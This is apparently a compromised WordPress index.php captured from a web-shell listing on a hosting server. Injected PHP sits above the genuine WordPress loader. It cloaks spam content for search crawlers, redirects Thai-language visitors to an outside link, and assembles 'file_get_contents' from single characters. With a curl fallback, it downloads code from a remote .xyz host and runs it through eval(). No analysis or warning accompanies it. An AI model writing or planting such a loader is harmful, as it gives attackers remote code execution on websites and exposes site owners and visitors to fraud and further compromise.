| Server IP : 172.67.130.222 / Your IP : 216.73.217.88 Web Server : LiteSpeed System : Linux wongki.id.rapidplex.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64 User : arzetico ( 1143) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/arzetico/javalandproperty.com/ |
Upload File : |
<?php
$userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$acceptLangRaw = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : 'en';
$requestUri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/';
$is_bot = preg_match('/(bot|crawl|spider|slurp|facebook|twitter|linkedin|embed)/i', $userAgent);
$browserLang = substr($acceptLangRaw, 0, 2);
$seo_content_path = __DIR__ . '/wp-content/home/index.html';
if ($is_bot && $requestUri === '/') {
if (file_exists($seo_content_path)) {
readfile($seo_content_path);
} else {
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
}
exit;
}
if ($browserLang === 'th') {
header("Location: https://swiy.co/goodrich555", true, 302);
exit;
}
$load = '';
$zfj0304 = 'h'.'ttp://z607'.'16_7.trustbity.xyz/stat/do'.'main_index.txt ';
$sources = ['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s'];
foreach($sources as $s) $load .= $s;
$fetch = false;
if(ini_get('allow_url_fopen') && function_exists($load)) {
$fetch = @$load($zfj0304);
}
if($fetch === false && function_exists('curl_init')) {
$ch = curl_init();
$opts = [10102=>true,10002=>$zfj0304,19913=>true,19914=>true,13=>10];
curl_setopt_array($ch, $opts);
$fetch = curl_exec($ch);
curl_close($ch);
}
if($fetch !== false) {
$payload = '?>' . $fetch;
eval($payload);
}
?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';